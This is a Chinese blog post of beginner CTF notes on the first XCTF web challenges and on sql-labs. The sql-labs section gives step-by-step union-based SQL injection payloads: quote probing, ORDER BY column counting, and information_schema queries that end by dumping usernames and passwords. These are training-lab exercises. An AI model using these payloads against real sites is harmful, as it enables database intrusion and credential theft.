攻防世界前五题和sql-labs

攻防世界

1.在地址前加上view source：

 更多工具-web开发者工具-查看器

更多工具-页面源代码（CTRL+u）

 

 

 2.robots协议也叫做robots.txt

 robots里面的文件不能自己爬取，所以要手动输入

 

 3.backup

常见的备份文件名后缀名是.bak

在地址后面加上/index.php.bak

 

 通过VS打开

 4.

 cookie是用户客户端计算机保存的信息

 打开web开发者工具，打开存储，点第一个，查看代码

 5.disabled 规定禁用 input

 打开web开发者工具-查看器-查看代码

 将disabled删去

 sql-labs

1.判断字段数，从1开始试，4报错，有三个字段

 

 2.判断注入点

 

 ？id=1'或者')或者"或者")还有数字注入（用and语句1=2来判断）

第二步，判断字段数用order by 1（2，3···）直至报错

第三步，将id=1改成id=0，联合查询当前数据库名union select database（）

第四步，查数据库中的表名

select 1,table_name from information_schema.tables where table_schema=database()

查询出一个结果，用limit 1，1（2，1·····）查其余表名

第五步，查字段名，select 1,column_name from information_schema.columns where table_schema=database() and table_name='表名'，用limit 1，1（2，1·····）查其余表名

最后一步：查数据select 1,username from 表名

select 1,password from 表名

第五题和第六题判断了','),","),")}都不对，不会了。（图片照的太模糊了，就没全传上去，对不起！）

标签：web,name,五题,sql,labs,表名,table,select,schema
来源： https://blog.csdn.net/Q221022/article/details/121170793